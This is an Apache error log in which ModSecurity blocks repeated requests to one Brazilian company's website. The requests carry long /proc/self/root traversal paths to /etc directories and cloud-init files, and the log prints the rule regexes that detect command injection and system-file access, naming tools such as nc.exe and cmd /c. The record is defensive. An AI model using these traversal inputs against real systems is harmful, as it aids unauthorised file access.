[Wed Mar 18 13:54:41.603300 2026] [:error] [pid 17653:tid 140411632822016] [client 216.73.216.191:21451] [client 216.73.216.191] ModSecurity: Warning. Pattern match "\\\\b(?:(?:n(?:map|et|c)|w(?:guest|sh)|telnet|rcmd|ftp)\\\\.exe\\\\b|cmd(?:(?:32)?\\\\.exe\\\\b|\\\\b\\\\W*?\\\\/c))" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "213"] [id "950002"] [rev "3"] [msg "System Command Access"] [data "Matched Data: cmd/c found within ARGS:fileloc: //lib/python2.7/site-packages/cloudinit/cmd/clean.py"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrY0cdf6f5d65gmYZT1aQAAAs0"]
[Wed Mar 18 13:54:41.603382 2026] [:error] [pid 17653:tid 140411632822016] [client 216.73.216.191:21451] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:(?:n(?:et(?:\\\\b\\\\W+?\\\\blocalgroup|\\\\.exe)|(?:map|c)\\\\.exe)|t(?:racer|elnet\\\\.exe|clsh8?)|(?:w(?:guest|sh)|rcmd)\\\\.exe|echo\\\\b\\\\W*?\\\\by+)\\\\b|c(?:md(?:(?:32)\\\\b|\\\\b\\\\W*?\\\\/c)|hmod.{0,40}?\\\\+.{0,3}x))|[\\\\;\\\\|\\\\`]\\\\W*?\\\\b(?:(?:c(?:h(?:grp|mod|own| ..." at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "221"] [id "950006"] [rev "3"] [msg "System Command Injection"] [data "Matched Data: cmd/c found within ARGS:fileloc: //lib/python2.7/site-packages/cloudinit/cmd/clean.py"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrY0cdf6f5d65gmYZT1aQAAAs0"]
[Wed Mar 18 13:54:44.487523 2026] [:error] [pid 15826:tid 140411699963648] [client 74.7.241.31:50276] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/prelink.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrY1OoXxyEfFpUF8f-QDAAAAUU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 13:54:51.158032 2026] [:error] [pid 15051:tid 140411565680384] [client 74.7.241.31:50278] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/zabbix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrY2imAPhZkrhU8w4mNcgAAAJU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 13:54:51.160080 2026] [:error] [pid 29882:tid 140411733534464] [client 216.73.216.191:9299] [client 216.73.216.191] ModSecurity: Warning. Pattern match "\\\\b(?:(?:n(?:map|et|c)|w(?:guest|sh)|telnet|rcmd|ftp)\\\\.exe\\\\b|cmd(?:(?:32)?\\\\.exe\\\\b|\\\\b\\\\W*?\\\\/c))" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "213"] [id "950002"] [rev "3"] [msg "System Command Access"] [data "Matched Data: cmd/c found within ARGS:fileloc: //usr/lib/python2.7/site-packages/cloudinit/cmd/clean.py"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrY2kzinOy1jxa1j4c4YQAAAQE"]
[Wed Mar 18 13:54:51.160160 2026] [:error] [pid 29882:tid 140411733534464] [client 216.73.216.191:9299] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:(?:n(?:et(?:\\\\b\\\\W+?\\\\blocalgroup|\\\\.exe)|(?:map|c)\\\\.exe)|t(?:racer|elnet\\\\.exe|clsh8?)|(?:w(?:guest|sh)|rcmd)\\\\.exe|echo\\\\b\\\\W*?\\\\by+)\\\\b|c(?:md(?:(?:32)\\\\b|\\\\b\\\\W*?\\\\/c)|hmod.{0,40}?\\\\+.{0,3}x))|[\\\\;\\\\|\\\\`]\\\\W*?\\\\b(?:(?:c(?:h(?:grp|mod|own| ..." at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "221"] [id "950006"] [rev "3"] [msg "System Command Injection"] [data "Matched Data: cmd/c found within ARGS:fileloc: //usr/lib/python2.7/site-packages/cloudinit/cmd/clean.py"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrY2kzinOy1jxa1j4c4YQAAAQE"]
[Wed Mar 18 13:55:01.846426 2026] [mime_magic:error] [pid 29882:tid 140411641214720] (70014)End of file found: [client 57.141.18.58:47260] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Wed Mar 18 13:55:10.106998 2026] [:error] [pid 17887:tid 140411649607424] [client 74.7.241.31:56224] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/prelink.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrY7gkwaGbbGflqUZAw2wAAAMs"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 13:55:27.255520 2026] [:error] [pid 15826:tid 140411565680384] [client 74.7.241.31:40296] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/statetab.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrY_-oXxyEfFpUF8f-QSAAAAVU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 13:55:36.822528 2026] [:error] [pid 14269:tid 140411565680384] [client 216.73.216.191:24552] [client 216.73.216.191] ModSecurity: Warning. Pattern match "\\\\b(?:(?:n(?:map|et|c)|w(?:guest|sh)|telnet|rcmd|ftp)\\\\.exe\\\\b|cmd(?:(?:32)?\\\\.exe\\\\b|\\\\b\\\\W*?\\\\/c))" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "213"] [id "950002"] [rev "3"] [msg "System Command Access"] [data "Matched Data: cmd/c found within ARGS:fileloc: //lib/python2.7/site-packages/cloudinit/cmd/cloud_id.pyo"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrZCAbLMZ6AikZjR9XgFQAAABU"]
[Wed Mar 18 13:55:36.822626 2026] [:error] [pid 14269:tid 140411565680384] [client 216.73.216.191:24552] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:(?:n(?:et(?:\\\\b\\\\W+?\\\\blocalgroup|\\\\.exe)|(?:map|c)\\\\.exe)|t(?:racer|elnet\\\\.exe|clsh8?)|(?:w(?:guest|sh)|rcmd)\\\\.exe|echo\\\\b\\\\W*?\\\\by+)\\\\b|c(?:md(?:(?:32)\\\\b|\\\\b\\\\W*?\\\\/c)|hmod.{0,40}?\\\\+.{0,3}x))|[\\\\;\\\\|\\\\`]\\\\W*?\\\\b(?:(?:c(?:h(?:grp|mod|own| ..." at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "221"] [id "950006"] [rev "3"] [msg "System Command Injection"] [data "Matched Data: cmd/c found within ARGS:fileloc: //lib/python2.7/site-packages/cloudinit/cmd/cloud_id.pyo"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrZCAbLMZ6AikZjR9XgFQAAABU"]
[Wed Mar 18 13:55:47.591644 2026] [:error] [pid 31803:tid 140411741927168] [client 74.7.241.31:54094] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/percona-server.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrZE-yqAr6etmhZHNrn3gAAAEA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 13:55:55.617614 2026] [:error] [pid 31803:tid 140411666392832] [client 74.7.241.31:54094] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/dracut.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrZG-yqAr6etmhZHNrn8AAAAEk"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 13:55:55.625512 2026] [:error] [pid 26799:tid 140411666392832] [client 216.73.216.191:12965] [client 216.73.216.191] ModSecurity: Warning. Pattern match "\\\\b(?:(?:n(?:map|et|c)|w(?:guest|sh)|telnet|rcmd|ftp)\\\\.exe\\\\b|cmd(?:(?:32)?\\\\.exe\\\\b|\\\\b\\\\W*?\\\\/c))" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "213"] [id "950002"] [rev "3"] [msg "System Command Access"] [data "Matched Data: cmd/c found within ARGS:fileloc: //usr/lib/python2.7/site-packages/cloudinit/cmd/cloud_id.pyo"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrZGta6ubjKNq_cu4a-ygAAA0k"]
[Wed Mar 18 13:55:55.625583 2026] [:error] [pid 26799:tid 140411666392832] [client 216.73.216.191:12965] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:(?:n(?:et(?:\\\\b\\\\W+?\\\\blocalgroup|\\\\.exe)|(?:map|c)\\\\.exe)|t(?:racer|elnet\\\\.exe|clsh8?)|(?:w(?:guest|sh)|rcmd)\\\\.exe|echo\\\\b\\\\W*?\\\\by+)\\\\b|c(?:md(?:(?:32)\\\\b|\\\\b\\\\W*?\\\\/c)|hmod.{0,40}?\\\\+.{0,3}x))|[\\\\;\\\\|\\\\`]\\\\W*?\\\\b(?:(?:c(?:h(?:grp|mod|own| ..." at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "221"] [id "950006"] [rev "3"] [msg "System Command Injection"] [data "Matched Data: cmd/c found within ARGS:fileloc: //usr/lib/python2.7/site-packages/cloudinit/cmd/cloud_id.pyo"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrZGta6ubjKNq_cu4a-ygAAA0k"]
[Wed Mar 18 13:56:53.375757 2026] [mime_magic:error] [pid 17653:tid 140411565680384] (70014)End of file found: [client 74.7.241.31:56854] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php, referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/usr/lib/debug/usr
[Wed Mar 18 13:56:55.808119 2026] [mime_magic:error] [pid 14269:tid 140411708356352] (70014)End of file found: [client 216.73.216.191:5233] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Wed Mar 18 13:56:57.002541 2026] [:error] [pid 15826:tid 140411599251200] [client 74.7.241.31:33166] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/yum.repos.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrZWeoXxyEfFpUF8f-Q1QAAAVE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 13:57:03.163330 2026] [mime_magic:error] [pid 11816:tid 140411590858496] (70014)End of file found: [client 216.73.216.191:29983] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Wed Mar 18 13:57:20.558268 2026] [mime_magic:error] [pid 29882:tid 140411624429312] (70014)End of file found: [client 216.73.216.191:62293] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Wed Mar 18 13:57:41.359141 2026] [:error] [pid 30077:tid 140411741927168] [client 74.7.243.128:58714] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/var/run/initramfs/state/etc/sysconfig"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrZhfu8EFLIOrSqIpsi4QAAAkA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/var/run/initramfs/state/etc
[Wed Mar 18 13:57:59.046911 2026] [mime_magic:error] [pid 17887:tid 140411582465792] (70014)End of file found: [client 57.141.18.10:55156] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Wed Mar 18 13:58:09.828574 2026] [mime_magic:error] [pid 15826:tid 140411557287680] (70014)End of file found: [client 66.249.74.169:51652] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Wed Mar 18 13:58:18.285964 2026] [mime_magic:error] [pid 30077:tid 140411716749056] (70014)End of file found: [client 57.141.18.51:56038] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Wed Mar 18 13:58:19.825394 2026] [:error] [pid 31803:tid 140411708356352] [client 74.7.241.31:60080] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/percona-server.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrZq-yqAr6etmhZHNrosQAAAEQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 13:58:25.481392 2026] [:error] [pid 30077:tid 140411607643904] [client 74.7.241.31:45546] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/init.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrZsfu8EFLIOrSqIpsjHgAAAlA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 13:58:25.576648 2026] [:error] [pid 29882:tid 140411708356352] [client 74.7.243.128:59498] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrZsUzinOy1jxa1j4c5ogAAAQQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 13:58:36.956600 2026] [:error] [pid 15051:tid 140411616036608] [client 74.7.241.31:45550] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/gnupg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrZvCmAPhZkrhU8w4mOZgAAAI8"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 13:58:38.658455 2026] [:error] [pid 15051:tid 140411641214720] [client 74.7.241.31:45550] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/grub.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrZvimAPhZkrhU8w4mOaAAAAIw"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
